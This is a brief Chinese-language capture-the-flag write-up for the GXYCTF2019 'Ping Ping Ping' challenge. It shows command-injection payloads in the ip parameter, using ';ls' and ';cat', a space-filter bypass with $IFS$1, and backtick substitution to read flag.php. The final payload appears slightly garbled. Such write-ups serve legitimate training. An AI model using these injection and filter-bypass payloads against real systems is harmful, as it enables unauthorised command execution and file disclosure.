[GXYCTF2019]Ping Ping Ping 1 - Xxiaoma解题

打开后，发现显示一个 /?ip=
我们直接在url里添加/?ip=127.0.0.1，发现有回显，这时候就可以用分号；来进行命令链接执行了。
输入url/?ip=127.0.0.1;ls
回显出来两个php文件!

直接构造payload:/?ip=127.0.0.1;cat /flag.php

才发现没那么简单，回显过滤了空格，可以使用$IFS$1来绕过空格，来进行查看。
再次构造payload:/?ip=127.0.0.1;cat$IFS$1flag.php

发现还是被过滤了

直接先查看index.php

过滤了很多很多

最后构造payload:/?ip=127.0.0.1;cat$IFS$1ls`` ---- ls用反引号包裹，键盘左上角esc下面

最后f12键查看源代码后即可得到flag